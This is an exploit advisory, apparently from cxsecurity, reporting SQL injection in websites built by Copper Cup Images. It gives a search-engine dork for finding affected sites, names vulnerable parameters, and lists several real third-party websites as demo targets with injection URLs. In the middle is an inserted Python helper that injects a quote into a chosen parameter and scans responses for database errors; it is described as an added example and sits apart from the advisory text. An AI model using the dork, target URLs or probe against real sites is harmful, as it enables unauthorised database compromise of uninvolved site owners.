Copper Cup Images SQLi

2018.05.28
Credit: Arm_Legi (CH)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Copper Cup Images SQLi
# Dork: intext:"Site by Copper Cup Images" inurl:cat_id= or inurl:gallery_id=
# Exploit Author: Arm_Legi (Anonplus)
# Website: http://anonplus.tk/
# Date: 27 May 2018
# Vendor: https://www.tourismus-marketing-bayerischer-wald.de/internet.html and https://www.putzwerbung.de/webdesign.html
# Version: Latest version
# CVE: N/A

Technical Details & Description:
=====================================================================================================================
A remote SQL injection vulnerability has been discovered in web applications built by Copper Cup Images (https://www.coppercupimages.com/).
The vulnerability allows remote attackers to inject their own SQL statements into the back-end query via unsanitized GET parameters and, depending on the privileges of the database account, to compromise the connected web server or DBMS.
=====================================================================================================================
Request Method(s):
[+] GET

Vulnerable File(s):
[+] Several different files use the same parameters, and all of them are vulnerable

Vulnerable Parameter(s):
[+] cat_id=
[+] gallery_id=
[+] other
=====================================================================================================================
Demo:
http://www.questionpursuit.com/take-a-quiz_id22.php?step=1&cat_id=10 <----- (cat_id is vulnerable)
https://www.visitbartlesville.com/frank-lloyd-wrights-price-tower_id58.php?action=view%27&place_id=50&cat_id=4 <----- (cat_id is vulnerable)
https://www.noark.org/galleries_id54?gallery_id=34 <----- (gallery_id is vulnerable)
view-source:http://www.warnersound.com/portfolio_id51.php?gallery_id=2%27 <----- here the SQL error is only visible in the page source, not in the rendered page, but the parameter is still vulnerable
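The last demo point, that the DBMS error shows up only in the page source, is easy to miss when testing by eye in a browser. The following Python helper is an added example and is not code from the advisory or from Copper Cup Images. It appends a single quote to one named query parameter while preserving the others (as in the visitbartlesville URL above, where only cat_id is of interest), then scans the raw response body, HTML comments included, for common DBMS error signatures and compares that with what a text-only rendering of the same page would reveal. The host `example.invalid`, the `SAMPLE_BODY` response and the error-pattern table are constructed for illustration; `fetch()` is included for live use, but the offline demo never touches the network.

```python
"""Error-based SQLi probe helper (added example, not part of the advisory)."""
import re
import urllib.request
from typing import Dict, List
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Signatures of common DBMS / driver error messages.  The advisory notes the
# errors are only visible in the page *source*, so every check below runs on
# the raw body (comments, attributes and all), never on a text rendering.
# Constructed for this example; extend as needed.
SQL_ERROR_PATTERNS = {
    "mysql": re.compile(
        r"You have an error in your SQL syntax|"
        r"Warning:\s+mysqli?_(?:fetch_\w+|num_rows|query)\(\)|"
        r"supplied argument is not a valid MySQL", re.I),
    "postgresql": re.compile(
        r"PostgreSQL.*ERROR|pg_query\(\)|Warning:\s+pg_", re.I),
    "mssql": re.compile(
        r"Unclosed quotation mark after the character string|"
        r"Microsoft OLE DB Provider for SQL Server", re.I),
    "sqlite": re.compile(
        r"SQLite3?::|sqlite_query\(\)|unrecognized token", re.I),
}


def build_probe_url(url: str, param: str, payload: str = "'") -> str:
    """Return ``url`` with ``payload`` appended to the value of ``param``.

    Every other query parameter is kept intact, so probing
    ``...?action=view&place_id=50&cat_id=4`` for ``cat_id`` only touches
    that one value.  Raises KeyError if ``param`` is not in the query string.
    """
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if param not in dict(pairs):
        raise KeyError(f"parameter {param!r} not in query string")
    probed = [(k, v + payload if k == param else v) for k, v in pairs]
    # urlencode() percent-encodes the quote, yielding cat_id=4%27 like the demo URLs.
    return urlunsplit(parts._replace(query=urlencode(probed)))


def find_sql_errors(body: str) -> List[str]:
    """Return the names of DBMSs whose error signatures appear in ``body``."""
    return [name for name, rx in SQL_ERROR_PATTERNS.items() if rx.search(body)]


def strip_html(body: str) -> str:
    """Crude comment/tag stripper approximating what a browser shows as text."""
    body = re.sub(r"<!--.*?-->", "", body, flags=re.S)
    return re.sub(r"<[^>]+>", "", body)


def fetch(url: str, timeout: float = 10.0) -> str:
    """Fetch ``url`` and return the raw body.  Only for authorised live tests."""
    req = urllib.request.Request(url, headers={"User-Agent": "sqli-probe/0.1"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample: a gallery page that swallows the query failure but
# leaves the driver's error message inside an HTML comment.
SAMPLE_BODY = """<html><head><title>Portfolio</title></head><body>
<!-- You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''2''' at line 1 -->
<div id="gallery"></div>
</body></html>"""


def probe_offline() -> Dict[str, List[str]]:
    """Run the signature check on the sample as raw source and as rendered text."""
    return {
        "raw": find_sql_errors(SAMPLE_BODY),
        "rendered": find_sql_errors(strip_html(SAMPLE_BODY)),
    }


if __name__ == "__main__":
    # Hypothetical target; mirrors the shape of the advisory's demo URLs.
    print("probe:", build_probe_url(
        "http://example.invalid/portfolio_id51.php?gallery_id=2", "gallery_id"))
    print(probe_offline())
```

Running the offline demo reports `mysql` for the raw source and nothing for the rendered text, which is exactly the situation the view-source demo describes: a scanner or tester that only looks at visible text would mark the page clean. Against a live target you would call `fetch(build_probe_url(url, param))` and pass the result to `find_sql_errors`, and only against systems you are authorised to test.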


Arm_Legi | Date: 2018-05-28 16:53 CET+1
Sorry, but I linked the wrong vendor web page! Here is the real one: https://www.coppercupimages.com/

Copyright 2025, cxsecurity.com
